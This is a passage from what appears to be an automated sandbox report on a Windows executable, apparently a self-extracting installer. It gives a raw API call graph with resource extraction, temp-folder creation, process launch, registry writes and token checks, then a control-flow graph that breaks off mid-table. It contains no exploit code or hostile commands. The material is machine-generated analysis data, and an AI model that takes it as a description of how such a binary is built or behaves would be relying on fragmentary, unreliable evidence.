API calls 2447->2448 2449 7ff737823042 2448->2449 2449->2284 2460 7ff7378212ec 2449->2460 2450->2447 2450->2452 2453 7ff737823db1 2450->2453 2494 7ff737822834 2450->2494 2452->2446 2452->2447 2453->2447 2453->2452 2454 7ff737823eb7 MessageBeep 2453->2454 2455 7ff737827f04 13 API calls 2454->2455 2456 7ff737823eca 2455->2456 2457 7ff737823ed3 MessageBoxA 2456->2457 2458 7ff737827e34 2 API calls 2456->2458 2457->2447 2458->2457 2461 7ff73782133c 2460->2461 2462 7ff7378214b5 2460->2462 2526 7ff7378211cc LoadLibraryA 2461->2526 2464 7ff737828470 7 API calls 2462->2464 2466 7ff7378214da 2464->2466 2466->2284 2466->2320 2467 7ff73782134d GetCurrentProcess OpenProcessToken 2467->2462 2468 7ff737821377 GetTokenInformation 2467->2468 2469 7ff7378214a0 CloseHandle 2468->2469 2470 7ff7378213a0 GetLastError 2468->2470 2469->2462 2470->2469 2471 7ff7378213b5 LocalAlloc 2470->2471 2471->2469 2472 7ff7378213d2 GetTokenInformation 2471->2472 2473 7ff7378213fc AllocateAndInitializeSid 2472->2473 2474 7ff737821491 LocalFree 2472->2474 2473->2474 2478 7ff737821445 2473->2478 2474->2469 2475 7ff737821481 FreeSid 2475->2474 2476 7ff737821452 EqualSid 2477 7ff737821476 2476->2477 2476->2478 2477->2475 2478->2475 2478->2476 2478->2477 2480 7ff737827d88 2479->2480 2481 7ff737827dd9 2479->2481 2482 7ff737827d90 IsDBCSLeadByte 2480->2482 2483 7ff737827db6 CharNextA 2480->2483 2481->2410 2482->2480 2483->2480 2483->2481 2485 7ff737827bc8 2484->2485 2485->2485 2486 7ff737827bec CharPrevA 2485->2486 2487 7ff737827bda 2485->2487 2486->2487 2487->2428 2489 7ff7378286c7 2488->2489 2490 7ff737828685 RtlVirtualUnwind 2488->2490 2493 7ff737828494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2489->2493 2490->2489 2495 7ff737822a2f 2494->2495 2505 7ff737822872 2494->2505 2497 7ff737822a50 2495->2497 2498 7ff737822a41 GlobalFree 2495->2498 2497->2453 2498->2497 2499 7ff7378228a5 GetFileVersionInfoSizeA 2500 7ff7378228c2 GlobalAlloc 2499->2500 2499->2505 2500->2495 2501 7ff7378228e1 GlobalLock 2500->2501 2501->2495 2502 7ff7378228fc GetFileVersionInfoA 2501->2502 2503 7ff737822920 VerQueryValueA 2502->2503 2502->2505 2504 7ff7378229ed GlobalUnlock 2503->2504 2503->2505 2504->2505 2505->2495 2505->2499 2505->2504 2506 7ff7378229d9 GlobalUnlock 2505->2506 2507 7ff73782261c 2505->2507 2506->2495 2508 7ff73782265b CharUpperA CharNextA CharNextA 2507->2508 2509 7ff7378227e0 GetSystemDirectoryA 2507->2509 2511 7ff73782269c 2508->2511 2512 7ff7378227dd 2508->2512 2510 7ff7378227f1 2509->2510 2513 7ff737822805 2510->2513 2516 7ff737827ba8 CharPrevA 2510->2516 2514 7ff7378227c7 GetWindowsDirectoryA 2511->2514 2515 7ff7378226a6 2511->2515 2512->2509 2517 7ff737828470 7 API calls 2513->2517 2514->2510 2519 7ff737827ba8 CharPrevA 2515->2519 2516->2513 2518 7ff737822814 2517->2518 2518->2505 2520 7ff737822705 RegOpenKeyExA 2519->2520 2520->2510 2521 7ff737822738 RegQueryValueExA 2520->2521 2522 7ff73782276b 2521->2522 2523 7ff7378227b4 RegCloseKey 2521->2523 2524 7ff737822774 ExpandEnvironmentStringsA 2522->2524 2525 7ff737822792 2522->2525 2523->2510 2524->2525 2525->2523 2527 7ff7378212bb 2526->2527 2528 7ff737821221 GetProcAddress 2526->2528 2531 7ff737828470 7 API calls 2527->2531 2529 7ff7378212ac FreeLibrary 2528->2529 2530 7ff73782123f AllocateAndInitializeSid 2528->2530 2529->2527 2530->2529 2532 7ff737821288 FreeSid 2530->2532 2533 7ff7378212ca 2531->2533 2532->2529 2533->2462 2533->2467 2536 7ff737825050 7 API calls 2535->2536 2537 7ff7378260bf LocalAlloc 2536->2537 2538 7ff73782610b 2537->2538 2539 7ff7378260dd 2537->2539 2541 7ff737825050 7 API calls 2538->2541 2540 7ff737824dcc 24 API calls 2539->2540 2542 7ff7378260fb 2540->2542 2543 7ff73782611d 2541->2543 2757 7ff737827700 GetLastError 2542->2757 2545 7ff73782615a lstrcmpA 2543->2545 2546 7ff737826121 2543->2546 2547 7ff73782618a 2545->2547 2548 7ff737826174 LocalFree 2545->2548 2549 7ff737824dcc 24 API calls 2546->2549 2551 7ff737824dcc 24 API calls 2547->2551 2550 7ff737826183 2548->2550 2552 7ff73782613f LocalFree 2549->2552 2550->2325 2553 7ff7378261ac LocalFree 2551->2553 2552->2550 2554 7ff737826100 2553->2554 2554->2550 2556 7ff737825050 7 API calls 2555->2556 2557 7ff737823f8b LocalAlloc 2556->2557 2558 7ff737823fdd 2557->2558 2559 7ff737823fad 2557->2559 2560 7ff737825050 7 API calls 2558->2560 2561 7ff737824dcc 24 API calls 2559->2561 2562 7ff737823fef 2560->2562 2563 7ff737823fcb 2561->2563 2564 7ff737824030 lstrcmpA 2562->2564 2565 7ff737823ff3 2562->2565 2758 7ff737827700 GetLastError 2563->2758 2568 7ff737824098 LocalFree 2564->2568 2569 7ff73782404e 2564->2569 2567 7ff737824dcc 24 API calls 2565->2567 2571 7ff737824011 LocalFree 2567->2571 2573 7ff737823fd6 2568->2573 2572 7ff737827ac8 28 API calls 2569->2572 2570 7ff737823fd0 2570->2573 2571->2573 2574 7ff73782406e LocalFree 2572->2574 2573->2322 2574->2573 2576 7ff737825050 7 API calls 2575->2576 2577 7ff737826001 2576->2577 2578 7ff737826006 2577->2578 2579 7ff73782604a 2577->2579 2581 7ff737824dcc 24 API calls 2578->2581 2580 7ff737825050 7 API calls 2579->2580 2582 7ff737826063 2580->2582 2588 7ff737826025 2581->2588 2583 7ff73782772c 13 API calls 2582->2583 2585 7ff73782606f 2583->2585 2584 7ff737823146 2584->2362 2589 7ff7378266c4 2584->2589 2585->2584 2586 7ff737826073 2585->2586 2587 7ff737824dcc 24 API calls 2586->2587 2587->2588 2588->2584 2590 7ff737825050 7 API calls 2589->2590 2591 7ff737826706 LocalAlloc 2590->2591 2592 7ff737826756 2591->2592 2593 7ff737826726 2591->2593 2595 7ff737825050 7 API calls 2592->2595 2594 7ff737824dcc 24 API calls 2593->2594 2596 7ff737826744 2594->2596 2597 7ff737826768 2595->2597 2783 7ff737827700 GetLastError 2596->2783 2598 7ff73782676c 2597->2598 2599 7ff7378267a5 lstrcmpA LocalFree 2597->2599 2601 7ff737824dcc 24 API calls 2598->2601 2602 7ff737826837 2599->2602 2603 7ff7378267ec 2599->2603 2605 7ff73782678a LocalFree 2601->2605 2607 7ff737826b14 2602->2607 2609 7ff73782684f GetTempPathA 2602->2609 2612 7ff7378264e4 53 API calls 2603->2612 2604 7ff737826749 2606 7ff73782674f 2604->2606 2605->2606 2610 7ff737828470 7 API calls 2606->2610 2608 7ff737827ac8 28 API calls 2607->2608 2608->2606 2611 7ff737826872 2609->2611 2619 7ff7378268a5 2609->2619 2613 7ff737823153 2610->2613 2759 7ff7378264e4 2611->2759 2615 7ff73782680c 2612->2615 2613->2332 2613->2362 2615->2606 2617 7ff737826814 2615->2617 2618 7ff737824dcc 24 API calls 2617->2618 2618->2604 2619->2606 2621 7ff7378268f9 GetDriveTypeA 2619->2621 2622 7ff737826adb GetWindowsDirectoryA 2619->2622 2623 7ff737826916 GetFileAttributesA 2621->2623 2631 7ff737826911 2621->2631 2625 7ff737826ca4 38 API calls 2622->2625 2623->2631 2625->2619 2626 7ff7378264e4 53 API calls 2626->2619 2627 7ff737826ca4 38 API calls 2627->2631 2628 7ff737826955 GetDiskFreeSpaceA 2630 7ff737826983 MulDiv 2628->2630 2628->2631 2629 7ff737822468 25 API calls 2629->2631 2630->2631 2631->2606 2631->2621 2631->2622 2631->2623 2631->2627 2631->2628 2631->2629 2632 7ff737826a02 GetWindowsDirectoryA 2631->2632 2633 7ff737827ba8 CharPrevA 2631->2633 2636 7ff737826a6d SetFileAttributesA 2631->2636 2637 7ff7378264e4 53 API calls 2631->2637 2632->2631 2634 7ff737826a2a GetFileAttributesA 2633->2634 2634->2631 2635 7ff737826a40 CreateDirectoryA 2634->2635 2635->2631 2636->2631 2637->2631 2639 7ff737826d3f GetDiskFreeSpaceA 2638->2639 2640 7ff737826d12 2638->2640 2642 7ff737826d80 MulDiv 2639->2642 2643 7ff737826f63 memset 2639->2643 2641 7ff737824dcc 24 API calls 2640->2641 2644 7ff737826d2f 2641->2644 2642->2643 2646 7ff737826dae GetVolumeInformationA 2642->2646 2834 7ff737827700 GetLastError 2643->2834 2815 7ff737827700 GetLastError 2644->2815 2649 7ff737826de6 memset 2646->2649 2650 7ff737826e45 SetCurrentDirectoryA 2646->2650 2648 7ff737826f7b GetLastError FormatMessageA 2652 7ff737826fbd 2648->2652 2816 7ff737827700 GetLastError 2649->2816 2654 7ff737826e6c 2650->2654 2651 7ff737826d34 2655 7ff737826f41 2651->2655 2656 7ff737824dcc 24 API calls 2652->2656 2661 7ff737826eb4 2654->2661 2663 7ff737826ed8 2654->2663 2659 7ff737828470 7 API calls 2655->2659 2658 7ff737826fd8 SetCurrentDirectoryA 2656->2658 2657 7ff737826dfe GetLastError FormatMessageA 2657->2652 2658->2655 2660 7ff73782326f 2659->2660 2660->2339 2660->2362 2662 7ff737824dcc 24 API calls 2661->2662 2662->2651 2663->2655 2817 7ff7378224f8 2663->2817 2666 7ff737825050 7 API calls 2665->2666 2667 7ff737825dab FindResourceA LoadResource LockResource 2666->2667 2668 7ff737825dfc 2667->2668 2684 7ff737825fcf 2667->2684 2669 7ff737825e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2668->2669 2670 7ff737825e56 2668->2670 2669->2670 2835 7ff737825c60 #20 2670->2835 2673 7ff737825e69 #20 2674 7ff737825e5f 2673->2674 2675 7ff737825ed1 #22 2673->2675 2678 7ff737824dcc 24 API calls 2674->2678 2676 7ff737825f55 2675->2676 2677 7ff737825f15 #23 2675->2677 2680 7ff737825f61 FreeResource 2676->2680 2681 7ff737825f75 2676->2681 2677->2674 2677->2676 2679 7ff737825f53 2678->2679 2679->2676 2680->2681 2682 7ff737825f9f 2681->2682 2683 7ff737825f81 2681->2683 2682->2684 2686 7ff737825fb1 SendMessageA 2682->2686 2685 7ff737824dcc 24 API calls 2683->2685 2684->2359 2685->2682 2686->2684 2688 7ff737824118 2687->2688 2707 7ff73782412f 2687->2707 2689 7ff737825050 7 API calls 2688->2689 2689->2707 2690 7ff737824145 memset 2690->2707 2691 7ff737824254 2692 7ff737824dcc 24 API calls 2691->2692 2693 7ff737824273 2692->2693 2694 7ff7378244ee 2693->2694 2696 7ff737828470 7 API calls 2694->2696 2697 7ff7378244ff 2696->2697 2697->2353 2698 7ff7378245d8 2698->2694 2700 7ff7378245f2 RegOpenKeyExA 2698->2700 2699 7ff7378242f5 CompareStringA 2699->2698 2699->2707 2700->2694 2704 7ff737824627 RegQueryValueExA 2700->2704 2701 7ff737824599 2703 7ff737824dcc 24 API calls 2701->2703 2702 7ff7378244df LocalFree 2702->2694 2708 7ff7378245b8 LocalFree 2703->2708 2710 7ff73782471c RegCloseKey 2704->2710 2711 7ff73782466c memset GetSystemDirectoryA 2704->2711 2705 7ff737825050 7 API calls 2705->2707 2707->2690 2707->2691 2707->2694 2707->2698 2707->2699 2707->2701 2707->2702 2707->2705 2712 7ff7378244ad LocalFree 2707->2712 2715 7ff7378241fd CompareStringA 2707->2715 2730 7ff737824394 2707->2730 2847 7ff737821684 2707->2847 2886 7ff737821d28 memset memset RegCreateKeyExA 2707->2886 2913 7ff73782473c CreateProcessA 2707->2913 2708->2694 2710->2694 2713 7ff73782469d 2711->2713 2714 7ff7378246b3 2711->2714 2712->2698 2712->2707 2717 7ff737827ba8 CharPrevA 2713->2717 2718 7ff73782114c _vsnprintf 2714->2718 2715->2707 2717->2714 2719 7ff7378246dc RegSetValueExA 2718->2719 2719->2710 2720 7ff737824574 2722 7ff737824dcc 24 API calls 2720->2722 2721 7ff7378243a5 GetProcAddress 2723 7ff737824521 2721->2723 2721->2730 2725 7ff737824597 2722->2725 2726 7ff737824dcc 24 API calls 2723->2726 2727 7ff737824553 LocalFree 2725->2727 2728 7ff737824544 FreeLibrary 2726->2728 2938 7ff737827700 GetLastError 2727->2938 2728->2727 2730->2720 2730->2721 2731 7ff737824480 FreeLibrary 2730->2731 2732 7ff7378244d3 FreeLibrary 2730->2732 2928 7ff7378279f0 2730->2928 2731->2712 2732->2702 2733->2355 2741 7ff73782778a 2734->2741 2735 7ff73782114c _vsnprintf 2736 7ff7378277df FindResourceA 2735->2736 2737 7ff73782775e LoadResource LockResource 2736->2737 2738 7ff737827801 2736->2738 2737->2738 2737->2741 2739 7ff737828470 7 API calls 2738->2739 2740 7ff73782782e 2739->2740 2740->2364 2741->2735 2742 7ff7378277b8 FreeResource 2741->2742 2743 7ff737827803 FreeResource 2741->2743 2742->2741 2743->2738 2745 7ff737825050 7 API calls 2744->2745 2746 7ff737824967 LocalAlloc 2745->2746 2747 7ff7378249a9 2746->2747 2748 7ff737824989 2746->2748 2750 7ff737825050 7 API calls 2747->2750 2749 7ff737824dcc 24 API calls 2748->2749 2751 7ff7378249a7 2749->2751 2752 7ff7378249bb 2750->2752 2751->2362 2753 7ff7378249d5 lstrcmpA 2752->2753 2755 7ff7378249bf 2752->2755 2754 7ff737824a0e LocalFree 2753->2754 2753->2755 2754->2751 2756 7ff737824dcc 24 API calls 2755->2756 2756->2754 2757->2554 2758->2570 2760 7ff7378265dd 2759->2760 2761 7ff737826516 2759->2761 2801 7ff737826b70 2760->2801 2790 7ff7378263b8 2761->2790 2765 7ff737828470 7 API calls 2769 7ff7378266a8 2765->2769 2767 7ff737826577 GetSystemInfo 2779 7ff737826591 2767->2779 2768 7ff7378265cc 2775 7ff737827ba8 CharPrevA 2768->2775 2769->2606 2784 7ff737822468 GetWindowsDirectoryA 2769->2784 2770 7ff73782662a CreateDirectoryA 2771 7ff73782667d 2770->2771 2772 7ff73782663f 2770->2772 2813 7ff737827700 GetLastError 2771->2813 2774 7ff737826649 2772->2774 2773 7ff737826688 2773->2765 2774->2773 2777 7ff737826ca4 38 API calls 2774->2777 2775->2760 2781 7ff73782665a 2777->2781 2778 7ff737826682 2778->2773 2779->2768 2780 7ff737827ba8 CharPrevA 2779->2780 2780->2768 2781->2773 2782 7ff737826666 RemoveDirectoryA 2781->2782 2782->2773 2783->2604 2785 7ff7378224c4 2784->2785 2786 7ff7378224a6 2784->2786 2788 7ff737828470 7 API calls 2785->2788 2787 7ff737824dcc 24 API calls 2786->2787 2787->2785 2789 7ff7378224df 2788->2789 2789->2619 2789->2626 2792 7ff7378263e3 2790->2792 2791 7ff73782114c _vsnprintf 2791->2792 2792->2791 2793 7ff737827ba8 CharPrevA 2792->2793 2796 7ff73782644b GetTempFileNameA 2792->2796 2794 7ff737826420 RemoveDirectoryA GetFileAttributesA 2793->2794 2794->2792 2795 7ff7378264b6 CreateDirectoryA 2794->2795 2795->2796 2797 7ff737826490 2795->2797 2796->2797 2798 7ff73782646b DeleteFileA CreateDirectoryA 2796->2798 2799 7ff737828470 7 API calls 2797->2799 2798->2797 2800 7ff7378264a2 2799->2800 2800->2767 2800->2768 2800->2773 2802 7ff737826b8b 2801->2802 2802->2802 2803 7ff737826b94 LocalAlloc 2802->2803 2804 7ff737826bb4 2803->2804 2805 7ff737826bf5 2803->2805 2806 7ff737824dcc 24 API calls 2804->2806 2809 7ff737827ba8 CharPrevA 2805->2809 2807 7ff737826bd2 2806->2807 2811 7ff737826626 2807->2811 2814 7ff737827700 GetLastError 2807->2814 2810 7ff737826c14 CreateFileA LocalFree 2809->2810 2810->2807 2812 7ff737826c61 CloseHandle GetFileAttributesA 2810->2812 2811->2770 2811->2774 2812->2807 2813->2778 2814->2811 2815->2651 2816->2657 2818 7ff737822562 2817->2818 2819 7ff737822525 2817->2819 2821 7ff737822567 2818->2821 2824 7ff7378225ab 2818->2824 2820 7ff73782114c _vsnprintf 2819->2820 2822 7ff73782253d 2820->2822 2823 7ff73782114c _vsnprintf 2821->2823 2825 7ff737824dcc 24 API calls 2822->2825 2827 7ff73782257f 2823->2827 2828 7ff73782114c _vsnprintf 2824->2828 2829 7ff73782255d 2824->2829 2825->2829 2826 7ff737828470 7 API calls 2830 7ff737822609 2826->2830 2831 7ff737824dcc 24 API calls 2827->2831 2832 7ff7378225c7 2828->2832 2829->2826 2830->2655 2831->2829 2833 7ff737824dcc 24 API calls 2832->2833 2833->2829 2834->2648 2836 7ff737825ced 2835->2836 2846 7ff737825d62 2835->2846 2837 7ff737825380 29 API calls 2836->2837 2839 7ff737825d04 2837->2839 2838 7ff737828470 7 API calls 2840 7ff737825d78 2838->2840 2841 7ff737825d0d #21 2839->2841 2839->2846 2840->2673 2840->2674 2842 7ff737825d28 2841->2842 2841->2846 2843 7ff737825770 CloseHandle 2842->2843 2842->2846 2844 7ff737825d4a 2843->2844 2845 7ff737825d4f #23 2844->2845 2844->2846 2845->2846 2846->2838 2848 7ff7378216d3 2847->2848 2939 7ff7378215e8 2848->2939 2851 7ff737827ba8 CharPrevA 2853 7ff737821766 2851->2853 2852 7ff737827d68 2 API calls 2854 7ff737821811 2852->2854 2853->2852 2855 7ff73782181a CompareStringA 2854->2855 2856 7ff737821a1b 2854->2856 2855->2856 2858 7ff73782184d GetFileAttributesA 2855->2858 2857 7ff737827d68 2 API calls 2856->2857 2859 7ff737821a28 2857->2859 2860 7ff737821867 2858->2860 2861 7ff7378219f3 2858->2861 2862 7ff737821acb LocalAlloc 2859->2862 2863 7ff737821a31 CompareStringA 2859->2863 2860->2861 2864 7ff7378215e8 2 API calls 2860->2864 2866 7ff737824dcc 24 API calls 2861->2866 2862->2861 2865 7ff737821aeb GetFileAttributesA 2862->2865 2863->2862 2873 7ff737821a60 2863->2873 2867 7ff73782188b 2864->2867 2871 7ff737821b01 2865->2871 2885 7ff73782194f 2866->2885 2869 7ff7378218b5 LocalAlloc 2867->2869 2874 7ff7378215e8 2 API calls 2867->2874 2868 7ff737821bd1 2872 7ff737828470 7 API calls 2868->2872 2869->2861 2870 7ff7378218d7 GetPrivateProfileIntA GetPrivateProfileStringA 2869->2870 2875 7ff737821984 2870->2875 2870->2885 2883 7ff737821b54 2871->2883 2876 7ff737821be9 2872->2876 2873->2873 2877 7ff737821a81 LocalAlloc 2873->2877 2874->2869 2879 7ff7378219ba 2875->2879 2880 7ff737821995 GetShortPathNameA 2875->2880 2876->2707 2877->2861 2881 7ff737821ab2 2877->2881 2884 7ff73782114c _vsnprintf 2879->2884 2880->2879 2882 7ff73782114c _vsnprintf 2881->2882 2882->2885 2947 7ff737822a6c 2883->2947 2884->2885 2885->2868 2887 7ff737822019 2886->2887 2888 7ff737821dce 2886->2888 2889 7ff737828470 7 API calls 2887->2889 2890 7ff73782114c _vsnprintf 2888->2890 2893 7ff737821e25 2888->2893 2891 7ff737822028 2889->2891 2892 7ff737821dee RegQueryValueExA 2890->2892 2891->2707 2892->2888 2892->2893 2894 7ff737821e29 RegCloseKey 2893->2894 2895 7ff737821e46 GetSystemDirectoryA 2893->2895 2894->2887 2896 7ff737827ba8 CharPrevA 2895->2896 2897 7ff737821e6a LoadLibraryA 2896->2897 2898 7ff737821e86 GetProcAddress FreeLibrary 2897->2898 2899 7ff737821f55 GetModuleFileNameA 2897->2899 2898->2899 2901 7ff737821ebe GetSystemDirectoryA 2898->2901 2900 7ff737821f78 RegCloseKey 2899->2900 2904 7ff737821ee8 2899->2904 2900->2887 2902 7ff737821ed5 2901->2902 2901->2904 2903 7ff737827ba8 CharPrevA 2902->2903 2903->2904 2904->2904 2905 7ff737821f11 LocalAlloc 2904->2905 2906 7ff737821f8e 2905->2906 2907 7ff737821f35 2905->2907 2909 7ff73782114c _vsnprintf 2906->2909 2908 7ff737824dcc 24 API calls 2907->2908 2910 7ff737821f53 2908->2910 2911 7ff737821fc4 2909->2911 2910->2900 2911->2911 2912 7ff737821fcd RegSetValueExA RegCloseKey LocalFree 2911->2912 2912->2887 2914 7ff7378247c2 WaitForSingleObject GetExitCodeProcess 2913->2914 2915 7ff7378248b3 2913->2915 2921 7ff7378247f9 2914->2921 2974 7ff737827700 GetLastError 2915->2974 2917 7ff7378248b8 GetLastError FormatMessageA 2919 7ff737824dcc 24 API calls 2917->2919 2918 7ff73782482a CloseHandle CloseHandle 2922 7ff73782491c 2918->2922 2924 7ff7378248aa 2918->2924 2919->2922 2921->2918 2923 7ff737822318 18 API calls 2921->2923 2925 7ff737828470 7 API calls 2922->2925 2927 7ff73782484d 2923->2927 2924->2922 2926 7ff73782492f 2925->2926 2926->2707 2927->2918 2929 7ff737827a25 2928->2929 2930 7ff737827ba8 CharPrevA 2929->2930 2931 7ff737827a63 GetFileAttributesA 2930->2931 2932 7ff737827a79 2931->2932 2933 7ff737827a96 LoadLibraryA 2931->2933 2932->2933 2934 7ff737827a7d LoadLibraryExA 2932->2934 2935 7ff737827aa9 2933->2935 2934->2935 2936 7ff737828470 7 API calls 2935->2936 2937 7ff737827ab9 2936->2937 2937->2730 2938->2693 2941 7ff737821609 2939->2941 2942 7ff737821621 2941->2942 2943 7ff737821651 2941->2943 2960 7ff737827ce8 2941->2960 2944 7ff737827ce8 2 API calls 2942->2944 2943->2851 2943->2853 2945 7ff73782162f 2944->2945 2945->2943 2946 7ff737827ce8 2 API calls 2945->2946 2946->2945 2948 7ff737822c24 2947->2948 2949 7ff737822aa0 GetModuleFileNameA 2947->2949 2950 7ff737828470 7 API calls 2948->2950 2949->2948 2959 7ff737822ac8 2949->2959 2951 7ff737822c37 2950->2951 2951->2868 2952 7ff737822acc IsDBCSLeadByte 2952->2959 2953 7ff737822af1 CharNextA CharUpperA 2955 7ff737822b9b CharUpperA 2953->2955 2953->2959 2954 7ff737822bf6 CharNextA 2956 7ff737822c08 CharNextA 2954->2956 2955->2959 2956->2948 2956->2952 2958 7ff737822b36 CharPrevA 2958->2959 2959->2952 2959->2953 2959->2954 2959->2956 2959->2958 2965 7ff737827c40 2959->2965 2963 7ff737827d00 2960->2963 2961 7ff737827d47 2961->2941 2962 7ff737827d0a IsDBCSLeadByte 2962->2961 2962->2963 2963->2961 2963->2962 2964 7ff737827d30 CharNextA 2963->2964 2964->2963 2966 7ff737827c58 2965->2966 2966->2966 2967 7ff737827c61 CharPrevA 2966->2967 2968 7ff737827c7d CharPrevA 2967->2968 2969 7ff737827c94 2968->2969 2970 7ff737827c75 2968->2970 2971 7ff737827cc7 2969->2971 2972 7ff737827c9e CharPrevA 2969->2972 2973 7ff737827cb5 CharNextA 2969->2973 2970->2968 2970->2969 2971->2959 2972->2971 2972->2973 2973->2971 2974->2917 2976 7ff7378222eb 2975->2976 2977 7ff737822281 2975->2977 2979 7ff737828470 7 API calls 2976->2979 2978 7ff737827ba8 CharPrevA 2977->2978 2980 7ff737822294 WritePrivateProfileStringA _lopen 2978->2980 2981 7ff7378222fd 2979->2981 2980->2976 2982 7ff7378222c7 _llseek _lclose 2980->2982 2981->2385 2982->2976

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_00007FF7378270A8 2 Function_00007FF737827BA8 0->2 24 Function_00007FF737827024 0->24 26 Function_00007FF737828648 0->26 28 Function_00007FF737824DCC 0->28 49 Function_00007FF737827CE8 0->49 51 Function_00007FF737827D68 0->51 62 Function_00007FF737828470 0->62 1 Function_00007FF737821D28 1->2 1->28 30 Function_00007FF73782114C 1->30 1->62 94 Function_00007FF737821084 2->94 3 Function_00007FF73782772C 3->30 3->62 4 Function_00007FF73782512C 75 Function_00007FF737821008 4->75 4->94 5 Function_00007FF7378278B0 5->2 5->62 6 Function_00007FF7378258B0 6->4 16 Function_00007FF737825B18 6->16 39 Function_00007FF7378251BC 6->39 58 Function_00007FF737825770 6->58 6->62 84 Function_00007FF73782527C 6->84 85 Function_00007FF737825380 6->85 7 Function_00007FF737824A30 8 Function_00007FF737823530 8->2 22 Function_00007FF737826CA4 8->22 8->28 48 Function_00007FF737824C68 8->48 57 Function_00007FF737826B70 8->57 68 Function_00007FF737824A60 8->68 9 Function_00007FF7378281B0 10 Function_00007FF737828930 11 Function_00007FF737828B30 12 Function_00007FF737822DB4 12->0 25 Function_00007FF737827AC8 12->25 27 Function_00007FF73782204C 12->27 12->28 32 Function_00007FF737825050 12->32 55 Function_00007FF7378212EC 12->55 12->62 64 Function_00007FF737823BF4 12->64 13 Function_00007FF737827E34 14 Function_00007FF737822834 19 Function_00007FF73782261C 14->19 15 Function_00007FF737822318 47 Function_00007FF737822244 15->47 17 Function_00007FF737828417 18 Function_00007FF737828818 41 Function_00007FF7378287BC 18->41 19->2 19->62 19->75 20 Function_00007FF737828A9C 21 Function_00007FF7378233A0 22->28 22->62 83 Function_00007FF7378224F8 22->83 86 Function_00007FF737827700 22->86 23 Function_00007FF7378260A4 23->28 23->32 23->86 25->28 82 Function_00007FF737828494 26->82 27->2 27->27 27->62 27->94 28->13 28->30 28->62 28->75 93 Function_00007FF737827F04 28->93 29 Function_00007FF7378211CC 29->62 31 Function_00007FF73782494C 31->28 31->32 33 Function_00007FF7378280D0 33->18 63 Function_00007FF737828870 33->63 34 Function_00007FF737827850 35 Function_00007FF7378288D0 35->10 91 Function_00007FF737828880 35->91 36 Function_00007FF737828750 37 Function_00007FF737822C54 37->12 37->15 37->28 53 Function_00007FF7378261EC 37->53 54 Function_00007FF7378230EC 37->54 76 Function_00007FF737821C0C 37->76 38 Function_00007FF7378263B8 38->2 38->30 38->62 38->75 39->25 40 Function_00007FF73782473C 40->15 40->28 40->62 40->86 42 Function_00007FF737827C40 43 Function_00007FF737823840 43->48 44 Function_00007FF737823B40 45 Function_00007FF7378266C4 45->2 45->22 45->25 45->28 45->32 52 Function_00007FF737822468 45->52 45->62 73 Function_00007FF7378264E4 45->73 45->86 46 Function_00007FF7378240C4 46->1 46->2 46->28 46->30 46->32 46->40 60 Function_00007FF7378279F0 46->60 46->62 46->86 92 Function_00007FF737821684 46->92 47->2 47->62 48->62 50 Function_00007FF7378215E8 50->49 52->28 52->62 53->27 53->42 53->62 54->2 54->3 54->15 54->22 54->23 54->25 54->28 54->31 54->45 54->46 54->62 65 Function_00007FF737823F74 54->65 72 Function_00007FF737825FE4 54->72 78 Function_00007FF737825D90 54->78 54->86 55->29 55->62 56 Function_00007FF737822A6C 56->42 56->62 56->75 57->2 57->28 57->75 57->86 59 Function_00007FF7378233F0 59->48 60->2 60->62 61 Function_00007FF737825870 62->82 64->13 64->14 64->28 64->62 64->93 65->25 65->28 65->32 65->86 66 Function_00007FF7378255E0 67 Function_00007FF7378257E0 68->28 68->75 69 Function_00007FF737825C60 69->58 69->62 69->85 70 Function_00007FF737828A62 70->20 71 Function_00007FF737828B60 72->3 72->28 72->32 73->2 73->22 73->38 73->57 73->62 73->86 74 Function_00007FF737828964 76->28 76->62 77 Function_00007FF737825690 77->44 78->28 78->32 78->69 79 Function_00007FF737823910 79->28 79->44 79->48 80 Function_00007FF737828910 81 Function_00007FF737828790 83->28 83->30 83->62 84->28 84->75 85->28 87 Function_00007FF737821500 87->48 87->62 88 Function_00007FF737827E00 89 Function_00007FF737828802 90 Function_00007FF737828200 90->35 90->37 90->74 92->2 92->28 92->30 92->50 92->51 92->56 92->62 92->75 92->94 93->62

                                                                                Executed Functions

                                                                                Function 00007FF7378240C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7ff7378240c4-7ff737824116 1 7ff737824118-7ff737824133 call 7ff737825050 0->1 2 7ff737824139-7ff737824141 0->2 1->2 9 7ff737824254-7ff73782427d call 7ff737824dcc 1->9 4 7ff737824145-7ff737824167 memset 2->4 6 7ff73782416d-7ff737824188 call 7ff737825050 4->6 7 7ff737824282-7ff737824295 4->7 6->9 18 7ff73782418e-7ff737824194 6->18 8 7ff737824299-7ff7378242a3 7->8 12 7ff7378242b7-7ff7378242c2 8->12 13 7ff7378242a5-7ff7378242ab 8->13 19 7ff7378244ee 9->19 17 7ff7378242c5-7ff7378242c8 12->17 13->12 16 7ff7378242ad-7ff7378242b5 13->16 16->8 16->12 20 7ff737824328-7ff73782433d call 7ff737821684 17->20 21 7ff7378242ca-7ff7378242e2 call 7ff737825050 17->21 22 7ff73782419d-7ff7378241a0 18->22 23 7ff737824196-7ff73782419b 18->23 24 7ff7378244f0-7ff73782451f call 7ff737828470 19->24 20->19 35 7ff737824343-7ff73782434a 20->35 21->9 38 7ff7378242e8-7ff7378242ef 21->38 27 7ff7378241ad-7ff7378241af 22->27 28 7ff7378241a2-7ff7378241ab 22->28 26 7ff7378241b5 23->26 30 7ff7378241b8-7ff7378241bb 26->30 27->30 31 7ff7378241b1 27->31 28->26 30->17 36 7ff7378241c1-7ff7378241cb 30->36 31->26 39 7ff73782436a-7ff73782436c 35->39 40 7ff73782434c-7ff737824353 35->40 41 7ff7378241cd-7ff7378241d0 36->41 42 7ff737824231-7ff737824234 36->42 43 7ff7378245d8-7ff7378245df 38->43 44 7ff7378242f5-7ff737824322 CompareStringA 38->44 50 7ff737824372-7ff737824379 39->50 51 7ff737824493-7ff73782449b 39->51 40->39 45 7ff737824355-7ff73782435c 40->45 46 7ff7378241db-7ff7378241dd 41->46 47 7ff7378241d2-7ff7378241d9 41->47 42->20 52 7ff73782423a-7ff737824252 call 7ff737825050 42->52 48 